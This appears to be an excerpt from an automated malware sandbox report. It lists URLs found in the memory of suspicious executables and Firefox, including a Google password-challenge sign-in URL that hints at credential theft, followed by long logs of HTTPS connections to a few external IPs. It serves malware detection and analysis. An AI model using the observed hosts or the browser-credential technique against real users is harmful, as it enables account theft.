Source: 5a20b6327b.exe, 0000000B.00000003.2407783071.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2401015492.0000000005646000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2408683711.0000000005649000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2392941957.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2465941395.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2392921802.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2677934929.000000000103D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2799820452.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2392941957.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2392921802.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2677934929.000000000103D000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2799820452.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2482168024.00000000054FA000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802975695.0000000005E29000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000022.00000003.2991788666.0000020F08F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000022.00000002.3045677932.0000020F08F08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000022.00000003.2991788666.0000020F08F0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000022.00000002.3046778370.0000020F09875000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: 5a20b6327b.exe, 0000000B.00000003.2388832715.000000000566F000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2498617192.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2725761957.000000000588A000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2843490317.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: 1e8e57d62a.exe, 0000000C.00000003.2498617192.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2725761957.000000000588A000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2843490317.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3090183170.0000020F7786B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3031129867.0000020F08195000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 186adf2617.exe, 00000014.00000003.2852277490.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 00000022.00000002.3045186093.0000020F08E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 186adf2617.exe, 00000014.00000003.2852277490.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 186adf2617.exe, 00000014.00000003.2852277490.0000000005F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000022.00000002.3065862518.0000020F0B048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000022.00000002.3097493984.0000020F7E9E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F063B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2389533075.000000000564C000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000022.00000002.3053253696.0000020F09FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3071151796.0000020F0B491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000022.00000002.3028292784.0000020F07D90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3065862518.0000020F0B048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000022.00000003.2951927762.0000020F100CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000020.00000002.2827987929.000001A9EE62A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2842097547.000001AA8AEE7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3089859108.0000020F775D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000022.00000002.3089859108.0000020F775D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.6:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.156:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50128 version: TLS 1.2
